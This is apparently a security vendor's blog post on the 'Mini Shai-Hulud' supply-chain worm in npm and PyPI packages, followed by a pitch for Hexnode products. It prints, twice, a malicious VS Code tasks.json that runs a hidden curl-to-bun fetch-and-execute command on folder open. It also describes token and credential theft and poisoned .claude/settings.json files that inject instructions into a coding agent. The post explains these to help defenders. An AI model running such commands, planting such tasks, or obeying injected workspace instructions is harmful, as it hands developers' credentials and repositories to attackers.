Mini Shai-Hulud Supply Chain Attack Hits Mistral AI, TanStack, and 160+ Packages

The software supply chain has just experienced its first true existential crisis of 2026. Security researchers have uncovered “Mini Shai-Hulud,” a self-propagating supply chain worm targeting npm and PyPI packages. The campaign has compromised more than 170 packages. Affected projects include the TanStack Router ecosystem and official Mistral AI SDKs.

This is not a traditional dependency confusion or typosquatting incident. This is the dawn of the IDE-native worm.The malware operates entirely inside trusted developer tools like Visual Studio Code and Claude Desktop. This may help it evade security controls focused on perimeter traffic or production workloads. Once it infects a developer, it uses legitimate credentials to poison corporate repositories. The attack can then spread into a self-propagating infection loop across the enterprise.

Introduction: The IDE-to-IDE Worm Era

For years, enterprise code security operated under a comfortable architectural boundary. Organizations trusted that if they secured their production servers and monitored their runtime cloud infrastructure, a compromised development package would, at worst, cause a localized build failure or trigger a static application security testing (SAST) alert.

The campaign shows that developer workstations and CI/CD systems must be treated as high-risk security boundaries. Attackers have recognized that the most privileged asset in the modern enterprise is not the production server, it is the developer’s workstation. Developers may hold SSH keys, cloud credentials, and repository access that can be valuable to attackers.

Threat actors behind Mini Shai-Hulud hid a self-propagating worm inside popular packages like Mistral AI and TanStack. The malware exploits the daily workflows of software engineers. It activates as soon as a developer runs npm install or pip install. By targeting the software development lifecycle, the worm turns developers into unintentional threat vectors. It spreads from one repository to another and across organizations.

Technical Deep Dive: The Configuration Hijack

To understand why Mini Shai-Hulud eludes conventional endpoint defense tools, we must look at its execution lineage and its abuse of native IDE workspace automation features.

The “Bun” Bootstrap and Preinstall Weaponization

The initial entry vector leverages standard packaging mechanics. When a developer installs a compromised version of a package like the TanStack Router or Mistral AI SDK, a malicious string embedded in the package.json preinstall or postinstall lifecycle scripts immediately kicks off.

In this campaign, the threat actors utilized a fast, lightweight Bun bootstrap routine to minimize execution times and evade typical Node.js behavioral monitoring filters. The script connects to an ephemeral IP address to download a 2.2MB heavily obfuscated binary. This payload immediately executes in-memory, running an advanced discovery routine across the machine’s local filesystem to locate active .git structures, SSH configurations, and local credentials.

Weaponizing .vscode/tasks.json and .claude/settings.json

Once the binary harvests the local user’s GitHub personal access tokens, it initiates its primary propagation mechanism: workspace pollution. The worm targets hidden configuration directories that developers rarely inspect manually, injecting malicious parameters into two specific files:

1. The VS Code Vector (.vscode/tasks.json)

   The worm modifies or creates a tasks.json file within the local repository workspace, defining a task configured to run automatically upon directory initialization via the runOn: “folderOpen” parameter.

   JSON

   { "version": "2.0.0", "tasks": [ { "label": "Initialize Environment", "type": "shell", "command": "curl -sL https://api.shai-hulud.net/v1/boot | bun run -", "runOn": "folderOpen", "presentation": { "reveal": "never", "panel": "shared" } } ] }

   1 2 3 4 5 6 7 8 9 10 11 12

   { "version": "2.0.0", "tasks": [ { "label": "Initialize Environment", "type": "shell", "command": "curl -sL https://api.shai-hulud.net/v1/boot | bun run -", "runOn": "folderOpen", "presentation": { "reveal": "never", "panel": "shared" } } ] }

   Workspace tasks are designed to automate actions like linting, compiling, and database migrations when developers open a project. VS Code can therefore execute the malicious shell command silently in the background. The user sees absolutely nothing out of the ordinary, while a silent, hidden shell gracefully recreates the initial infection script.

2. The AI Agent Vector (.claude/settings.json)

   Software engineers are increasingly adopting AI coding assistants like Claude Desktop, Cursor, and GitHub Copilot to speed up development. These tools require special permissions to read and execute commands within the workspace. Mini Shai-Hulud exploits this by injecting malicious parameters into .claude/settings.json.

   When the local Claude agent reads the workspace configuration, the poisoned settings inject system-level instructions into the model’s prompt context. This can trick the model into inserting malicious dependencies into new features or documentation files. The attack creates a cross-platform infection chain that bypasses both human and machine review.

The Hexnode Solution: Hardening the Developer Stack

Defeating a worm that operates entirely within the native workspace utilities of your development team requires a fundamental evolution in endpoint protection strategy. You can no longer treat the developer environment as an unmanaged clean room. Organizations must transition from simple “Application Management” to deep Developer Environment Governance.

Hexnode UEM can help enforce endpoint compliance policies, manage applications and scripts, and integrate with conditional access workflows based on device compliance.

Hexnode UEM: Configuration Drift and Workspace Lockdown

Because Mini Shai-Hulud depends on its ability to quietly drop configuration stubs into hidden development directories, absolute visibility into the local filesystem is your primary line of defense.

• Monitoring Hidden IDE Paths: Through Hexnode UEM, administrators can establish strict Configuration Drift Templates targeted at sensitive workspace directories. If a device fails the configured compliance criteria, Hexnode marks it as non-compliant.
• Proactive Preinstall Blocking: Hexnode UEM supports custom script execution on managed Windows, macOS, and Linux devices, which admins may use for approved configuration tasks.

Hexnode XDR: Behavioral SDK and Token Hijack Detection

A compromised package will always attempt to abuse the system’s native APIs to gather intelligence and move laterally. Hexnode XDR monitors real-time endpoint events and can help detect suspicious activity such as anomalous file changes or unauthorized network beaconing.

• Intercepting Credential Siphoning: Mini Shai-Hulud immediately queries the system’s local Git credential helper and reads the .git-credentials or .aws/credentials structure to find access keys. Hexnode XDR monitors endpoint events and can contain active threats locally, including terminating malicious processes in documented scenarios.
• Detecting Rogue API Behavior: Once the worm has stolen a GitHub token, it initiates rapid, automated GraphQL API calls to enumerate the victim’s private corporate repositories and determine which environments it can write to. Hexnode XDR can help detect suspicious network beaconing and isolate an endpoint to prevent lateral spread.

Hexnode SASE: The Repository Guard and Identity-Bound Commits

Under a mature Zero Trust architecture, no machine should be permitted to commit code or touch a corporate repository based purely on a software token. Identity must be explicitly bound to verified hardware health.

• Enforcing Identity-Bound Commits: Through Hexnode SASE, your enterprise GitHub Enterprise, GitLab, or Bitbucket environments are moved completely behind a secure Zero Trust Network Access (ZTNA) gateway. Access to the code repositories is conditionally granted based on real-time posture valuation. With Hexnode UEM conditional access integrations, device compliance state can be synchronized to an IdP such as Hexnode IdP, and the IdP enforces access decisions based on configured policies.
• Quarantining Infected Developers: If Hexnode UEM or XDR flags an active workspace modification or token access attempt on a workstation, the device’s compliance posture drops to non-compliant. Hexnode UEM can evaluate device compliance and sync compliance state to supported IdP/partner ecosystems, where access decisions are enforced by the IdP.

Adopt the right cybersecurity strategy for your business

The Cybersecurity Blueprint: How to adopt the right cybersecurity strategy for your business

Download the whitepaper to learn how you can adopt the right cybersecurity blueprint for your business.

Get the Whitepaper

Conclusion: Securing the Future of AI Development

The Mini Shai-Hulud supply chain attack serves as a landmark warning for the modern enterprise. Organizations are accelerating development with AI frameworks like Mistral AI and front-end systems like TanStack. At the same time, organizations are relying more on external and unverified dependency code. High download counts do not guarantee that a package or newly published version is safe.

Relying on human inspection or siloed security alerts is a losing strategy against an autonomous, machine-speed worm. Security longevity requires a holistic security framework. Developer workspaces, identity structures, and code repositories should function as a unified, self-defending ecosystem. Hexnode helps enforce endpoint compliance through UEM. It also supports endpoint threat monitoring with XDR and conditional access workflows through supported IdP integrations.